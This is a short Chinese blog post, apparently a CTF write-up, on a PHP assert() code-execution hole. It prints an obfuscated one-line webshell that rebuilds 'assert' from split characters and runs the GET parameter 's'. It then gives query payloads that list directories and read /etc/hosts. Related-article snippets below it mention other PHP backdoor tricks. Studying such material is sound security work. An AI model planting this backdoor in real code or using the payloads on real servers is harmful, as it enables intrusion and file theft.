assert()代码执行漏洞

最新推荐文章于 2023-04-16 12:36:22 发布
最新推荐文章于 2023-04-16 12:36:22 发布
阅读量3.2k 收藏 3
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33505576/article/details/94393890
版权 
   <?php 
	$poc="a#s#s#e#r#t";
	$poc_1=explode("#",$poc); 
	$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
	$poc_2($_GET['s']) 
?>

使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执行漏洞

利用此漏洞查询其他文件,例如hosts

首先,扫描上级目录,payload

?s=print_r(scandir('../'))

在这里插入图片描述
看到这是linux操作系统的文件目录

所以hosts应该在etc里面,读一下就能看到了。

使用fopen() 或者 readfile() 函数读取文件

?s=print_r(readfile('../etc/hosts'))
?s=print_r(fopen('../etc/hosts','r'))

在这里插入图片描述
完成文件读取。

复古追月
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUGKU web22 assert注入漏洞
m0_49762339的博客
01-20 473
这道题和攻防世界那道/.git泄露差不多 题目给了提示: <?PHP $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc_1=assert $_GET=s 因此只需要构造payload=?s=XXX即可 这里先尝试payload=?s=phpinfo();存在回显 因
【CTF bugku shell】关于assert()代码执行漏洞利用、目录查询函数scandir()/system()
zw05011的博客
01-15 4090
知识点 assert()代码执行漏洞 目录查询函数scandir()/system() 题目 1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 通过代码审计得到asser
【学习笔记】CWE-617: 可达的assertion断言安全漏洞
rm -rf *
04-04 160
由于public方法在调用时系统必须进行参数检查而私有方法是直接使用的,因此不要使用断言进行public方法的参数有效性检查以及执行程序需要完成的正常操作,当断言用于公共方法中的参数检查时,就可能会出现“可达的assertion”安全漏洞。在私有方法调用时会使用直接传入的参数,如果私有方法对参数有特定的要求可以在方法处使用断言进行参数检查。在处理恶意数据包时,受影响的产品服务器中的缺陷可能会导致断言失败,这可能会导致拒绝服务的情况。不变量反应程序的特性,可以通过分析程序的不变量监测程序运行中的异常。
关于assert()的问题
ye_ge的博客
09-19 775
第一次大量接触他人的代码,发现代码中有大量的使用ASSERT()这个宏,在自己的学习中只是了解一点,但没有用过,这次算是见识了,在每次进入一个代码模块后,就对传入的参数进行一个ASSERT检查,这样就可以减少程序运行是挂掉的危险,并且把危险直接拦截住,关于使用这个是好还是坏,这个我还无法判断,反正听公司的人说,有些小组合并代码太烂啦,还有结构体的使用,枚举类型的使用,这些在学习中都没有特别大量的使
PHP 代码审计 --------代码执行漏洞
最新发布
qq_62344745的博客
04-16 133
eval()、assert() 将输入的字符串参数作为PHP程序代码执行去访问,并加上php代码,看看是否能够执行执行了!不符合php代码,就会执行下面的输出,同时!!在这里也可以执行,system()
php代码审计-代码执行.pdf
12-14
在 PHP 中,有多种方式可以实现代码执行,包括 eval()、assert()、preg_replace() 等。下面我们将对这些方式进行详细的讲解和分析。 一、 eval() 函数 eval() 函数是 PHP 中的一种语言构造器,用于将字符串作为 ...
【基础篇】第09篇:PHP代码审计笔记--代码执行漏洞1
08-03
常见代码注射函数:如:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、creat
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
代码执行漏洞通常发生在开发者未能正确验证用户输入的情况下,允许攻击者通过注入恶意代码来改变程序的执行流程。以下是一些关键概念: 1. **原理**:当应用程序将未经验证的用户输入转化为可执行代码时,就会产生...
assert函数
03-10
1. **异常路径的检测**:在理论上不可能达到的代码路径上放置断言,可以帮助开发者识别逻辑漏洞或错误的假设。 2. **参数的有效性检查**:虽然不适用于公共方法的参数验证,但在私有方法中,使用断言检查参数的有效...
php 执行操作系统命令
hw1287789687的专栏
12-21 229
php 如何执行操作系统命令呢? &lt;?php $type="1";//1-exec ; 2-system if(!empty($_GET['type'])){ $type=$_GET['type']; } if(empty($_GET['cmd2'])){ echo "please input cmd"; exit(); } $cmd2=$_GET['cm...
assert引起的代码注射
weixin_33734785的博客
10-01 90
源自一道ctf题 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; assert("strpos('$file', '..') === false") o...
断言ASSERT() 是什么
SuGuolin的博客
02-20 1070
ASSERT()一般被称为断言,它是一个调试程序时经常使用的宏。 它定义在头文件中,通常用于判断程序中是否出现了非法的数据,在程序运行时它计算括号内的表达式的值。 在此强调的一点,ASSERT()捕获的是非法情况,而非错误情况,错误情况是必然存在的,并且一定需要作出相应的处理,而非法情况则不是,它可能只是漏洞而已。 其用法如下: ASSERT(n != 0); k = 10/n;
-----已搬运-------攻防世界:mfw --------assert() 闭合后的任意代码执行
Zero_Adam的博客
02-19 230
目录:一.学到的知识点:二、我的做题思路三、WP做法: 一.学到的知识点: bool or die() 当 前面的 为真的时候,后面的就不执行assert()语法 。的知识点如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码执行。跟eval()类似, 不过eval($assertion)只是执行符合php编码规范的$code_str assert(mixed $assertion, $exception) // 返回值为bool型 assert()会检查 assert
assert执行php,PHP:如何使用assert
weixin_31504783的博客
03-19 218
按合同设计我相信断言在PHP中用得不多.你可以使用它,如果你Design By Contract.Design by Contract (DbC) orProgramming by Contract is an approachto designing computer software. Itprescribes that software designersshould define form...
PHP执行系统命令的有几个常用的函数
weixin_33815613的博客
08-28 1600
先附上测试用的python脚本 testCsv.py #!/usr/bin/python3 # -*- coding: utf-8 -*- import time import csv import random import sys filepath = '/Users/magicyou/Desktop/python/temp/' # 生成csv文件 def exportCsv(title,...
php执行linux系统命令的注意
weixin_30563001的博客
05-18 658
1.首先需要设置权限在/etc/sudoers文件里,添加www    ALL=(ALL)      NOPASSWD:    ALL2.然后是修改文件夹的权限组chown    -R         www-data:www-data           dirname 3.还有一些命令是要使用绝对路径的如果执行失败,不妨把绝对路径加上...
assert使用
include_heqile的博客
07-31 347
断言assert就是用来判断程序中的某一个关键部分是否正确,如果有一个处理是非常重要的,此处理不正确便无法使程序继续运行下去,便可在此设置断言,来判断一个表达式的值是否为true,如果为false,程序便会终止 在java中可以使用assert expression1 : expression2,来是的断言错误的时候输出相应的提示信息 示例代码如下:参考自博客园博主:http://www.cn...
php一句话后门,PHP一句话后门集锦
weixin_42436686的博客
03-10 681
404页面的利用:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>404页面是网站常用的文件,一般建议好后很少有人会去对它进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值